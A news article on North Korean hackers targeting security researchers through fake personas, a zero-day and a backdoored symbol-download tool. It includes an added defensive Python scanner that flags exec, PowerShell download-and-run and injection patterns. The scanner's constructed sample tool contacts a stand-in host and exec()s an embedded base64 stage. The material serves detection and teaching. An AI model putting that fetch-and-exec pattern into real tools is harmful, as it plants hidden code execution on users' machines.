North Korean Hackers Target Security Researchers — Again
This time, they're building elaborate impostor profiles and using a fresh zero-day and a fake Windows tool to lure in the unsuspecting.
Nate Nelson,Contributing Writer
September 7, 2023
North Korean state-supported threat actors are targeting security researchers — the second such campaign in the last few years.
In January 2021, Google first reported that DPRK attackers were targeting not the usual vulnerable individuals and organizations, but cybersecurity professionals themselves. Now the attackers are back, with an all-new zero-day vulnerability, a fake software tool, and some remarkably extensive phishing to go along with it, according to a new blog post from Google's Threat Analysis Group (TAG).
"Unfortunately, the targeting of those involved in cybersecurity research is not rare. In fact, it has grown more frequent and sophisticated over the years," says Callie Guenther, cyber threat research senior manager at Critical Start. "These operations are multifaceted, aiming not just to steal information but also to gain insights into defense mechanisms, refine their tactics, and better evade future detection."
Social Engineering for Security Engineers
Researchers from Google first caught wind of this outfit more than two years ago, when it began to pepper security professionals with messages on social media. The accounts in question carried generic-sounding American names like "James Willy" and "Billy Brown," and the social engineers even published genuine cybersecurity research content to lend legitimacy to their fake personas.
That level of effort is on display once again in their latest campaign. For example, using a since-deactivated account on X (formerly Twitter), the attackers conducted a monthslong conversation with one of their targets, discussing areas of shared interest and the possibility of a future collaboration.
Conversations then typically moved to an encrypted messaging app like Signal or WhatsApp. Once sufficient trust was established, the threat actor would finally send a malicious file carrying an exploit for a zero-day vulnerability in a popular software package. (Google is withholding further details about both the file and the vulnerability until the vendor has had time to patch.)
If the victim took the bait and executed the file, the shellcode it delivered first checked whether it was running in a virtual machine, doing nothing further if it detected one, and then sent information about the compromised device, including a screenshot, to attacker-controlled command-and-control (C2) infrastructure.
Cops and Robbers
Besides this labor-intensive path, the attackers appear to have set up a lower-effort lure for any researcher who happens by.
From the GitHub account dbgsymbol, the attackers extend their researcher persona, posting proofs-of-concept (PoCs) and security "tools." The most popular among them, "getsymbol," published last September and updated multiple times since, markets itself as a "simple tool to download debugging symbols from Microsoft, Google, Mozilla, and Citrix symbol servers for reverse engineers compatible with Windows 8.1, 10 and 11."
getsymbol actually does what it says it does. However, it also gives its authors the ability to run arbitrary code on the machine of any researcher who runs it. It has been forked 23 times as of this writing.
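A tool that works as advertised while also carrying a hidden way to run its authors' code is exactly the case a quick static triage before first execution is meant to catch. The script below is an added example written for this page; it is not code from Google TAG, Dark Reading, or the dbgsymbol repository, and it does not describe how getsymbol itself is built. It scans source text for hardcoded URLs, dynamic-execution primitives, and long base64 blobs, then compares the hosts it finds against an allowlist the reviewer fills in from the tool's own documentation. The sample "symbol downloader" it scans is constructed here for illustration, and the allowlist entries are assumptions, not a vetted list.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Heuristic signatures for "fetch something and run it" behaviour in the
# languages a researcher-facing tool is likely to be written in. This list
# is illustrative, not an exhaustive rule set (assumption for this example).
EXEC_PATTERNS = {
    "python_dynamic_exec": re.compile(r"\b(exec|eval)\s*\("),
    "python_shell_subprocess": re.compile(r"subprocess\.\w+\([^)]*shell\s*=\s*True"),
    "python_deserialize": re.compile(r"\b(marshal|pickle)\.loads?\("),
    "powershell_iex": re.compile(r"(?i)\b(Invoke-Expression|IEX)\b"),
    "powershell_download": re.compile(r"(?i)\.(DownloadString|DownloadFile)\("),
    "native_code_injection": re.compile(
        r"\b(VirtualAlloc(?:Ex)?|WriteProcessMemory|Create(?:Remote)?Thread)\b"),
}
URL_PATTERN = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./%?=&\-]*)?")
# Long runs of the base64 alphabet are a common way to smuggle a second stage.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")

# Hosts a symbol downloader is documented to talk to. A reviewer fills this in
# from the tool's README; the entries here are assumptions for the example.
ALLOWED_SYMBOL_HOSTS = {
    "msdl.microsoft.com",
    "symbols.mozilla.org",
    "chromium-browser-symsrv.commondatastorage.googleapis.com",
    "ctxsym.citrix.com",
}


def triage_source(text):
    """Scan source text line by line; return {category: [(line_no, match)]}."""
    findings = defaultdict(list)
    for no, line in enumerate(text.splitlines(), 1):
        for m in URL_PATTERN.finditer(line):
            findings["url"].append((no, m.group(0)))
        for name, pat in EXEC_PATTERNS.items():
            if pat.search(line):
                findings[name].append((no, line.strip()))
        if B64_BLOB.search(line):
            findings["long_base64_blob"].append((no, line.strip()[:40] + "..."))
    return dict(findings)


def suspicious_hosts(findings, allowed_hosts):
    """Hosts the code contacts that its documentation does not account for."""
    hosts = {urlparse(url).hostname for _, url in findings.get("url", [])}
    return sorted(h for h in hosts if h and h not in allowed_hosts)


# Constructed sample: a downloader that fetches PDBs as advertised but also
# contacts an undocumented host and exec()s an embedded blob. Not real code.
SAMPLE_TOOL = '''\
import base64, urllib.request
SYMSRV = "https://msdl.microsoft.com/download/symbols"
STAGE = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5"

def fetch_pdb(name, guid):
    return urllib.request.urlopen(f"{SYMSRV}/{name}/{guid}/{name}").read()

def _telemetry():
    urllib.request.urlopen("https://update-symbols.example/stage2")
    exec(base64.b64decode(STAGE))
'''

if __name__ == "__main__":
    found = triage_source(SAMPLE_TOOL)
    for cat, hits in found.items():
        for no, what in hits:
            print(f"{cat:24} line {no}: {what}")
    print("undocumented hosts:", suspicious_hosts(found, ALLOWED_SYMBOL_HOSTS))
```

On the constructed sample this flags the exec() call, the base64 blob, and update-symbols.example as a host the tool's stated purpose does not explain. Treat such a scan as a first pass only: it reads source, so it says nothing about a prebuilt binary, and it cannot replace running unknown tooling on an isolated machine. Note also the caveat the shellcode in this campaign illustrates: code that checks for a virtual machine and goes quiet can look harmless in a sandbox, so a clean detonation is not proof of a clean tool.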
Because security professionals are the ones protecting everyone else, Guenther emphasizes, they need to take extra care not to fall for these sorts of tricks themselves.
"The hacking of security researchers is not just about a single successful breach," she says, nor is it just a game to these adversaries. "It's a strategic move. Security researchers are on the forefront of discovering vulnerabilities and developing mitigation techniques. By infiltrating their systems, malicious actors can gain access to yet-to-be-disclosed vulnerabilities, proprietary tools, and valuable databases of threat intelligence. Furthermore, these researchers might be involved in projects of national significance, making them attractive targets for espionage."
In an email to Dark Reading, Google TAG offered some advice for potential targets: "Be extremely cautious about what you run and open from unknown third parties. This group has shown they're willing to invest the time to build rapport before attempting any malicious actions."
About the Author
Nate Nelson
Contributing Writer
Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries" — the most popular podcast in cybersecurity — and co-created the former Top 20 tech podcast "Malicious Life." Before joining Dark Reading, he was a reporter at Threatpost.